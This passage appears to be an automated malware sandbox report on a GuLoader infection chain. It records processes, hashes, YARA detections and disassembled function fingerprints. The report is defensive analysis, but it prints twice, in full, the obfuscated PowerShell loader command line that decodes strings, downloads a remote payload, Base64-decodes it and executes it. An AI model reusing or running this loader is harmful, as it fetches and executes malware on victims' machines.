');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDiridSkabe Es rShaks ho[Forp$ HepP,gtvlRammado,bdUnineJernv Agee bienund,dEchoe Ko.rTrninUndieInt ]Kje.=Vare$ H nCDatte SimdNds.eBenar GretOpverBiins Lom ');$Stoppesteders=Wirepullers ' B d$UnbeE Xyld St isn ktklineT,ffrKvale nhasTele.De tDUnauoHnsswNa.pnEftelSw.noVanaaHeted fagFCou,iFilml buneBi,c(Tou,$InbeDJolae OmskRev aParmg G.yrHolma Hanm,earmMis,ePrest Def, efa$EuchH Fo egudskIntes Kade.nred TheoNr,ekFo.mt S,eo Belr,nio)Prep ';$Heksedoktor=$Chairlift;Baggrundsfarve102 (Wirepullers 'Aden$DesiGNaviLTandOMinab StaaMor LPhen: GartSek iPro.NBe lgFib eLivenDemaereamSEdwa=Du g(Ru dtOut EAr,hs subtChem-DemipWkthAdaviTGypshStor Hin$ElidHFernE isgkSylvs MarET.lsDEliaOanark B ttAmplOResuR ran) As ');while (!$tingenes) {Baggrundsfarve102 (Wirepullers 'Nske$vedugP,oplRe io TrtbEnetaacidlBrnd: ycaA quegD.uteUnkerIndheDra n Vai=Me.l$PepttHaanr,jtruKa.ieMem ') ;Baggrundsfarve102 $Stoppesteders;Baggrundsfarve102 (Wirepullers 'LayoSskketCenta f or Ad TF,di-YngeS J.wl,asseE uleAnlbP ska to v4Pr.f ');Baggrundsfarve102 (Wirepullers 'Seas$SkalGSpidlMiraOChelb .onaUbruLSitu:LangTUn,liskurNIndfG strEinddnBesvE YupSTerm=Tetr( In.TestaeA insFripTTrul- A sPGy,gAP.estPa.ahArga Ital$S.anHI raeAniwKDrilsKotue eriDSurfoRedeKSnipTOverOPilerBlok)C rv ') ;Baggrundsfarve102 (Wirepullers 'Udda$ eigMisplSteroFi kbFor ATil lAc o: ho.tS deAUtnkL luiL SteI eleaShufT orauShamMOlig= rak$ ndgSletl naO Vaab esoaPostLQuil:EkstAGeneU ComBS iprCockIBigoeSupeT CraaWeir+ Qua+ Bri%Konc$ FunC ,loOPalaWCapiaNonpG elaEGa,t. Filc StaO Udmu ,kyNFornT Ing ') ;$Dekagrammet=$Cowage[$Talliatum];}$Avlsdyr=312700;$flonel=30554;Baggrundsfarve102 (Wirepullers 'Bl m$IndeGdipllSlalo .awBHarvaAgliLKrad: oftS RefaMalmN ebefReprEPortdConfeJordi ,orSSp.stHorsIShoes WmkKHvssEskru Mu k=Skru He sGSuprE CraTP rc-Pip C Ar OKar N ndvt .ivEAfvaNreinTE he Far,$ Sq hUnseeRelaK cinS StaEHo oD.espoMateKYan.TS,vrO,estrTane ');Baggrundsfarve102 (Wirepullers 'Skj $Mim gDejelStraoLevebFj iaAfbel Jom:CoenPFlgelBaroaVolcnCa.aeOto,rC asi C rnFiolgForl K dn= yv Gru[FalkSSvajy svbstur tNo.ce NonmFax,.BaphCBastopa,fn ChovResueHypsr ComtBo s]O,nk:Sulc:FaraFOverrGrejoScepm JdiBBr saSubtsResteProm6 Sky4EnerSMuk tEkstr Plai ammnSun gclei(Lakf$Nu iSMellaFlamn Tilf IncePolidau oeDu lisu csGrovtFolkiPa,as U,dkT boe iss) fl, ');Baggrundsfarve102 (Wirepullers 'Ti,s$ Ou GModeLLaidoSideBR cuaForgLRbar:BlodTmotoa SkrA ssigS.naEUnfeb anta BrunPel k Q.iE ,oarUdlu komp=For rbi[ kufSp lpyAmyrs eckt UnnEBlo Mi.tr.fru tOptae PraxOphjTLith. eteBassNClosC .trOUpbrdValdIFe.iNSjofgPent],pli:Over:Dom aZaursInt,Ca.tiiBlodIForb.TvangTilbE tefTKlagsThirTSpriRBekmIAns.n B og.rip(Cy r$ .hepMargL prea opantm ie,eriROutbITakonLignGU,bl)Te a ');Baggrundsfarve102 (Wirepullers 'G ps$ StoGNedklepidO Dribblo,a V.dlMers:FrgesHjrekLegeILepiSRegi= Hen$SocitTvanABusba Oveg uttETi bbreifABedknBignKN tiEpatiRBa,a.SlutsCre,uAktiBNa ssSocit ensrLedeiUnioN Sumg bl( fbr$udlgA.ottVJapaLIntesMarmDBedvYAdlir ubb,F ev$Tv,kfKinglHi doCarmn Unke SyrLBava)slet ');Baggrundsfarve102 $Skis;"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1506470995.000001BDA3983000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:14:57
Start date:	15/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:15:07
Start date:	15/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDiridSkabe Es rShaks ho[Forp$ HepP,gtvlRammado,bdUnineJernv Agee bienund,dEchoe Ko.rTrninUndieInt ]Kje.=Vare$ H nCDatte SimdNds.eBenar GretOpverBiins Lom ');$Stoppesteders=Wirepullers ' B d$UnbeE Xyld St isn ktklineT,ffrKvale nhasTele.De tDUnauoHnsswNa.pnEftelSw.noVanaaHeted fagFCou,iFilml buneBi,c(Tou,$InbeDJolae OmskRev aParmg G.yrHolma Hanm,earmMis,ePrest Def, efa$EuchH Fo egudskIntes Kade.nred TheoNr,ekFo.mt S,eo Belr,nio)Prep ';$Heksedoktor=$Chairlift;Baggrundsfarve102 (Wirepullers 'Aden$DesiGNaviLTandOMinab StaaMor LPhen: GartSek iPro.NBe lgFib eLivenDemaereamSEdwa=Du g(Ru dtOut EAr,hs subtChem-DemipWkthAdaviTGypshStor Hin$ElidHFernE isgkSylvs MarET.lsDEliaOanark B ttAmplOResuR ran) As ');while (!$tingenes) {Baggrundsfarve102 (Wirepullers 'Nske$vedugP,oplRe io TrtbEnetaacidlBrnd: ycaA quegD.uteUnkerIndheDra n Vai=Me.l$PepttHaanr,jtruKa.ieMem ') ;Baggrundsfarve102 $Stoppesteders;Baggrundsfarve102 (Wirepullers 'LayoSskketCenta f or Ad TF,di-YngeS J.wl,asseE uleAnlbP ska to v4Pr.f ');Baggrundsfarve102 (Wirepullers 'Seas$SkalGSpidlMiraOChelb .onaUbruLSitu:LangTUn,liskurNIndfG strEinddnBesvE YupSTerm=Tetr( In.TestaeA insFripTTrul- A sPGy,gAP.estPa.ahArga Ital$S.anHI raeAniwKDrilsKotue eriDSurfoRedeKSnipTOverOPilerBlok)C rv ') ;Baggrundsfarve102 (Wirepullers 'Udda$ eigMisplSteroFi kbFor ATil lAc o: ho.tS deAUtnkL luiL SteI eleaShufT orauShamMOlig= rak$ ndgSletl naO Vaab esoaPostLQuil:EkstAGeneU ComBS iprCockIBigoeSupeT CraaWeir+ Qua+ Bri%Konc$ FunC ,loOPalaWCapiaNonpG elaEGa,t. Filc StaO Udmu ,kyNFornT Ing ') ;$Dekagrammet=$Cowage[$Talliatum];}$Avlsdyr=312700;$flonel=30554;Baggrundsfarve102 (Wirepullers 'Bl m$IndeGdipllSlalo .awBHarvaAgliLKrad: oftS RefaMalmN ebefReprEPortdConfeJordi ,orSSp.stHorsIShoes WmkKHvssEskru Mu k=Skru He sGSuprE CraTP rc-Pip C Ar OKar N ndvt .ivEAfvaNreinTE he Far,$ Sq hUnseeRelaK cinS StaEHo oD.espoMateKYan.TS,vrO,estrTane ');Baggrundsfarve102 (Wirepullers 'Skj $Mim gDejelStraoLevebFj iaAfbel Jom:CoenPFlgelBaroaVolcnCa.aeOto,rC asi C rnFiolgForl K dn= yv Gru[FalkSSvajy svbstur tNo.ce NonmFax,.BaphCBastopa,fn ChovResueHypsr ComtBo s]O,nk:Sulc:FaraFOverrGrejoScepm JdiBBr saSubtsResteProm6 Sky4EnerSMuk tEkstr Plai ammnSun gclei(Lakf$Nu iSMellaFlamn Tilf IncePolidau oeDu lisu csGrovtFolkiPa,as U,dkT boe iss) fl, ');Baggrundsfarve102 (Wirepullers 'Ti,s$ Ou GModeLLaidoSideBR cuaForgLRbar:BlodTmotoa SkrA ssigS.naEUnfeb anta BrunPel k Q.iE ,oarUdlu komp=For rbi[ kufSp lpyAmyrs eckt UnnEBlo Mi.tr.fru tOptae PraxOphjTLith. eteBassNClosC .trOUpbrdValdIFe.iNSjofgPent],pli:Over:Dom aZaursInt,Ca.tiiBlodIForb.TvangTilbE tefTKlagsThirTSpriRBekmIAns.n B og.rip(Cy r$ .hepMargL prea opantm ie,eriROutbITakonLignGU,bl)Te a ');Baggrundsfarve102 (Wirepullers 'G ps$ StoGNedklepidO Dribblo,a V.dlMers:FrgesHjrekLegeILepiSRegi= Hen$SocitTvanABusba Oveg uttETi bbreifABedknBignKN tiEpatiRBa,a.SlutsCre,uAktiBNa ssSocit ensrLedeiUnioN Sumg bl( fbr$udlgA.ottVJapaLIntesMarmDBedvYAdlir ubb,F ev$Tv,kfKinglHi doCarmn Unke SyrLBava)slet ');Baggrundsfarve102 $Skis;"
Imagebase:	0xd00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.1700021777.0000000008960000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.1700261011.000000000BB86000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:15:07
Start date:	15/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:15:27
Start date:	15/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x220000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:16:11
Start date:	15/10/2024
Path:	C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe"
Imagebase:	0xdc0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	03:16:13
Start date:	15/10/2024
Path:	C:\Windows\SysWOW64\verclsid.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\verclsid.exe"
Imagebase:	0xbe0000
File size:	11'776 bytes
MD5 hash:	190A347DF06F8486F193ADA0E90B49C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	03:16:41
Start date:	15/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff73feb0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF886CFA3BA Relevance: .5, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0496d72ef767bece86dc9b9d27f67ace6eb4c01917cd678b70a583829152f479
Instruction ID: 86cf40198830eb8c7f0422253883cbc70b851323e13356e427d7abed15e1bd55
Opcode Fuzzy Hash: 0496d72ef767bece86dc9b9d27f67ace6eb4c01917cd678b70a583829152f479
Instruction Fuzzy Hash: 9802F031D0DBC58FE3969BA898552A4BBE2FF96660F1801FFC04DCB193DA589C46C742

Function 00007FF886C2C022 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1517562499.00007FF886C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886c20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412490e4f5ad76224bb165ab14bea421794f678ab1020592efba43fd75e93be4
Instruction ID: 336b8b06c791a7cb22400564fcc79902f9055006c7b8c0a2029d08570ad55c5d
Opcode Fuzzy Hash: 412490e4f5ad76224bb165ab14bea421794f678ab1020592efba43fd75e93be4
Instruction Fuzzy Hash: 80E1A270908A4D8FEBA8DF28C8557E977D2FB54350F14426AE84DC7291CF789940CB82

Function 00007FF886C2B2BB Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1517562499.00007FF886C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886c20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75992c897803bad783e4dadac17d90dfeca162a9e4d9d8b01b923d472c5ea069
Instruction ID: 197765050df2317c709dc91f810d3a3a8c07d90f1becc2a3220b0083c03d4bd1
Opcode Fuzzy Hash: 75992c897803bad783e4dadac17d90dfeca162a9e4d9d8b01b923d472c5ea069
Instruction Fuzzy Hash: 14E17030918A4D8FEBA8DF28D8557E977D2FF58355F04423AE84DC7291DF38A9418B82

Function 00007FF886C2E515 Relevance: .7, Instructions: 682COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1517562499.00007FF886C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886c20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5098dfdf779b36676d93c90839fa51cbcaa2107328a8d9c8cca222e2ed3d7f3
Instruction ID: e69e743b7e812dbc4efb55c9f0f7ae6cf5e1bf89aebc9d2f75e7f96532243e0a
Opcode Fuzzy Hash: c5098dfdf779b36676d93c90839fa51cbcaa2107328a8d9c8cca222e2ed3d7f3
Instruction Fuzzy Hash: C1328330A18A4D8FDB89EF5CD495AE97BE2FF68350F14016AD40DD7296CA35EC81CB81

Function 00007FF886CF969B Relevance: .6, Instructions: 624COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b14cd2f03dad39b1808286ca0a9a3f73a36fe7605ed6ade3849923830416006
Instruction ID: a073bb9dc56786114477fccb4d39d78ab54309baed99c34a226aa1047ec0b7b8
Opcode Fuzzy Hash: 1b14cd2f03dad39b1808286ca0a9a3f73a36fe7605ed6ade3849923830416006
Instruction Fuzzy Hash: C1121331E1DB854FEBAAAA2888552B47BE2FF56660F1801FEC04DC71D3DE58AC45C742

Function 00007FF886CF7A36 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 503452127f369d959ad948606fb520ebbba6cd8e7faec884513a924aff0629d8
Instruction ID: df6b94e502aaadb9c0f0807c78fcfb289e542549809b0abc3d755635a86ef4b3
Opcode Fuzzy Hash: 503452127f369d959ad948606fb520ebbba6cd8e7faec884513a924aff0629d8
Instruction Fuzzy Hash: 8AF12731E0DF864FE7969728A8152B47BE2FF56260B1901FBC14DC7193DE59AC06C3A1

Function 00007FF886CFACA3 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b850b47f0cec3e182e85ad7109a506cbe48032363ab00bf228a4fb391bca95
Instruction ID: 74f8728c8202aa209be91d9bf8dafc11a75bb763ade963554d972668b1dfc727
Opcode Fuzzy Hash: f7b850b47f0cec3e182e85ad7109a506cbe48032363ab00bf228a4fb391bca95
Instruction Fuzzy Hash: 8EE10432E0DA898FE7999B688855278BBE2FF55360F1801BEC04DC71D3DE68AC45C742

Function 00007FF886CF7A93 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b8793bdde9d9d11d814f62872ac9d8bf53c77af68beb453181046b3f207108
Instruction ID: e4084d1f4261333d9d59233791dbfa9aa953060c2078574bebf4dbcbb6ed7fb5
Opcode Fuzzy Hash: 55b8793bdde9d9d11d814f62872ac9d8bf53c77af68beb453181046b3f207108
Instruction Fuzzy Hash: 15B14932E0CE4A4FE7A59B28A8452743BE2FF95394F5401BAC10DC7193DE69EC06C351

Function 00007FF886CF93BB Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9c70d614f0497377c941e817840f888f9ec7d75361a2c8bf10468af86ae2d2
Instruction ID: 9fd25f8a8160768fb866d5e39e039363b388e945eb897f3227102b9269dcfd1c
Opcode Fuzzy Hash: 0a9c70d614f0497377c941e817840f888f9ec7d75361a2c8bf10468af86ae2d2
Instruction Fuzzy Hash: 98A12731A1DB890FEB9AD63898152B47BE2FF56250F0801FFD44DC7193E959AC0AC382

Function 00007FF886C2BC36 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1517562499.00007FF886C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886c20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137a4d2093a87f73a011b86bdbba5d0e6533a64331df5abef3607cd59273c862
Instruction ID: e9715e8c185e2c00d82879cc0e7749f97354a0efe5feb1c79ff2442b8720b02e
Opcode Fuzzy Hash: 137a4d2093a87f73a011b86bdbba5d0e6533a64331df5abef3607cd59273c862
Instruction Fuzzy Hash: 8CB1D730918A4D8FEB68DF28C8557E93BD2FF55350F04426EE84DC7296CB34A945CB82

Function 00007FF886CF5813 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ab0bb81d69e1092902f74184ef0d47bdbabf9b59ab6656ea4fe17bf8cbcf6e
Instruction ID: c35159a799f09438d6a509b2d657e435fe788c6adaf94ce814a6087caff0bc1a
Opcode Fuzzy Hash: 66ab0bb81d69e1092902f74184ef0d47bdbabf9b59ab6656ea4fe17bf8cbcf6e
Instruction Fuzzy Hash: C9A13871E1CA9A4FE7AADA2C94552B977D2FF653A0B9801BBC10DC71D3ED589C01C381

Function 00007FF886CF48A9 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4171ed95b5270f6f9eaf1395f136a6a69db8e793ebcd84ee357ce651bd8d4706
Instruction ID: f13b287e28845fadf2d71922ac552235e4e4b076859fedd06c29f7e041f7bcec
Opcode Fuzzy Hash: 4171ed95b5270f6f9eaf1395f136a6a69db8e793ebcd84ee357ce651bd8d4706
Instruction Fuzzy Hash: A2711732F1DE864FE7A99A6C945227977D3FF916A0B58417EC00ED31D3ED58AC01C286

Function 00007FF886C24258 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1517562499.00007FF886C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886c20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c10815e14f122a84a146c451720af7447c840c12f1934811dbb023fb4e3e967
Instruction ID: 1ca5cab33980a26efd3c11637121fd129cbf3601d63d4a84e895a13530795496
Opcode Fuzzy Hash: 3c10815e14f122a84a146c451720af7447c840c12f1934811dbb023fb4e3e967
Instruction Fuzzy Hash: 43714931A0C7858FE746DB2CD8919A17BE1FF96324B0441BFD4CAC72A3D925AC46C751

Function 00007FF886CFA1CB Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac2c217531527f414a42d80305360fd21a8a03ab84c0acb64ae5138548e608ed
Instruction ID: 01ae38665e0da4b65610124963fe0350b7dfc5d002783c609782493b7c811468
Opcode Fuzzy Hash: ac2c217531527f414a42d80305360fd21a8a03ab84c0acb64ae5138548e608ed
Instruction Fuzzy Hash: F3411931F0CA898FEB95EBA994456B9BBE2FF54350B0401BAD40DC71D3DE5AAC04C782

Function 00007FF886CFA9DB Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3ee5149ae09368d4dfeb9950d312baf15658060de6b7553554fcc178281f555
Instruction ID: 20a1493c015abe666b19a7b27a4d1bba69e81dea90445eaec61cdba5c4c4fbbc
Opcode Fuzzy Hash: b3ee5149ae09368d4dfeb9950d312baf15658060de6b7553554fcc178281f555
Instruction Fuzzy Hash: CB411B31E0CA898FEB95EBA894556B9BBE2FF54350B0401BBD44DC71D3DE58AC09CB42

Function 00007FF886CF58E2 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518420698.00007FF886CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff886cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae442013bd34be063b5e3fbc611f1d1ad1f0550e2d42a40617dcc9e27333ead
Instruction ID: 5d145081abfcf5fbde1a9f23e300fdc636237d4ad16ad9910f1330be57e99222
Opcode Fuzzy Hash: 8ae442013bd34be063b5e3fbc611f1d1ad1f0550e2d42a40617dcc9e27333ead
